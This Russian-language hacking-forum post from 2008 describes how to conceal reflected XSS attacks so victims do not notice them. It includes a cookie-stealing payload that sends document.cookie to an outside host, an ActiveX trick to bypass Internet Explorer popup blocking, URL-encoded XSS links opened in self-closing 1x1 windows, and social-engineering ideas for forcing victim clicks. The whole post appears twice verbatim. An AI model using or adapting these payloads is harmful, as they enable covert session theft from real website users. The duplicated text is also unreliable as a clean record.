ZET36
07.04.2008, 18:16
И так разработкой данного метода маскировки меня сподвигла
огромная актуальность пассивных xss уязвимостей . как минимум каждый 2рой сайт в рунете уязвим
но вот загвоздка этих атак заключается в там что не каждый юзер пойдёт по ссылке типа
http://irc.run.net/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
да и перенапрвление не даёт должной беспаливности так как оказываясь перенаправленным юзер конешно увидит url .
идеальным бы казалось спрятать страницу с хсс в невидимый фрэйм. но вот куки с него неидут так как фрэйм находится на другом домене
остались всплывающие окна. конешно не идеальный вариант маскировки но всёрвно неплохой (например заходит жертва на нашу страницу вылетает маленькое окошко 1 на 1 . автоматом он думает что это реклама и закрывает его темболее в следующих скриптах приведён пример самостоятельного закрытия этого окошка при передаче куков)
но есть одно НО во всех браузерах есть предупреждение всплывающих окон а у некоторых они отключены вообще
в принципе обход блокировки сплывающих окон в ie можно обойти с помощью ActiveX
<object id=x classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A width=1 height=1 align=middle>
<PARAM NAME=ActivateApplets VALUE=1><PARAM NAME=ActivateActiveXControls VALUE=1></object>
<SCRIPT>
function shellscript()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%7 2%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67% 69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65 %72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6 F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C% 65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout(' msgWindow.close() ',4000)
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}
if (window.rasta!=true) {
setTimeout(' main() ',100)
}
</script>
где в переменной xss_site зашифрованным в unescape содержится ссылка с xss (просто взял в пример алерт
http://irc.kgts.ru/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic"><script>alert(1)</script>)
но вот в Опере и Лисе ActiveX вообще нету. что же делать?
наверно вы обратили внимание что при механическом клике на ссылку никакой блокировки не всплывает. а вот если функция её вызывает клик автоматом
скажем так
<form name="f">
<input type="button" name="n" onClick="zet()">
</form>
<script>
document.f.n.click();
function zet()
{
msgWindow=open("http://www.yandex.ru/","rastabzc","width=1,height=1'");
}
</script>
то блокировка всёравно как не жалко присутствует
остаётся только как можно хитрее поступить с механическим кликом (тоесть заставить жертву не только зайти на страницу но ещё и щёлкнуть по ней мышкой)
прибегнем немножко к социнженерии
<body onclick='zet()'>
<script>
function zet()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%7 2%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67% 69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65 %72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6 F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C% 65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout(' msgWindow.close() ',4000);
}
</script>
</body>
помимо этого кода в странице должно быть чтонибуть интересное что бы заставило нажать жертву на кнопку
Но я неочень люблю Соц инженерию (особенно представляться блондинкой с большой грудью просящей посмотреть на фотки.exe или что то в этом роде). хотелось бы сделать атаку как можно автоматизированее
и вот меня осенило что если сделать это механическое нажатие вынужденным ( ну тоесть когда на странице выскакивает алерт или ошибка мы сначало должны его закрыть а потом уже страницу. (закрыть сразу страницу с открытм алертом неполучиться) и собственно что бы её закрыть мы должны по ней щёлкнуть мышью)
вот вам пример вынужденного механического нажатия. кто поможет реализовать этот метод буду очень благодарен
кому интересно прошу развивать тему
огромная актуальность пассивных xss уязвимостей . как минимум каждый 2рой сайт в рунете уязвим
но вот загвоздка этих атак заключается в там что не каждый юзер пойдёт по ссылке типа
http://irc.run.net/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
да и перенапрвление не даёт должной беспаливности так как оказываясь перенаправленным юзер конешно увидит url .
идеальным бы казалось спрятать страницу с хсс в невидимый фрэйм. но вот куки с него неидут так как фрэйм находится на другом домене
остались всплывающие окна. конешно не идеальный вариант маскировки но всёрвно неплохой (например заходит жертва на нашу страницу вылетает маленькое окошко 1 на 1 . автоматом он думает что это реклама и закрывает его темболее в следующих скриптах приведён пример самостоятельного закрытия этого окошка при передаче куков)
но есть одно НО во всех браузерах есть предупреждение всплывающих окон а у некоторых они отключены вообще
в принципе обход блокировки сплывающих окон в ie можно обойти с помощью ActiveX
<object id=x classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A width=1 height=1 align=middle>
<PARAM NAME=ActivateApplets VALUE=1><PARAM NAME=ActivateActiveXControls VALUE=1></object>
<SCRIPT>
function shellscript()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%7 2%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67% 69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65 %72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6 F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C% 65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout(' msgWindow.close() ',4000)
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}
if (window.rasta!=true) {
setTimeout(' main() ',100)
}
</script>
где в переменной xss_site зашифрованным в unescape содержится ссылка с xss (просто взял в пример алерт
http://irc.kgts.ru/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic"><script>alert(1)</script>)
но вот в Опере и Лисе ActiveX вообще нету. что же делать?
наверно вы обратили внимание что при механическом клике на ссылку никакой блокировки не всплывает. а вот если функция её вызывает клик автоматом
скажем так
<form name="f">
<input type="button" name="n" onClick="zet()">
</form>
<script>
document.f.n.click();
function zet()
{
msgWindow=open("http://www.yandex.ru/","rastabzc","width=1,height=1'");
}
</script>
то блокировка всёравно как не жалко присутствует
остаётся только как можно хитрее поступить с механическим кликом (тоесть заставить жертву не только зайти на страницу но ещё и щёлкнуть по ней мышкой)
прибегнем немножко к социнженерии
<body onclick='zet()'>
<script>
function zet()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%7 2%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67% 69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65 %72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6 F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C% 65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout(' msgWindow.close() ',4000);
}
</script>
</body>
помимо этого кода в странице должно быть чтонибуть интересное что бы заставило нажать жертву на кнопку
Но я неочень люблю Соц инженерию (особенно представляться блондинкой с большой грудью просящей посмотреть на фотки.exe или что то в этом роде). хотелось бы сделать атаку как можно автоматизированее
и вот меня осенило что если сделать это механическое нажатие вынужденным ( ну тоесть когда на странице выскакивает алерт или ошибка мы сначало должны его закрыть а потом уже страницу. (закрыть сразу страницу с открытм алертом неполучиться) и собственно что бы её закрыть мы должны по ней щёлкнуть мышью)
вот вам пример вынужденного механического нажатия. кто поможет реализовать этот метод буду очень благодарен
кому интересно прошу развивать тему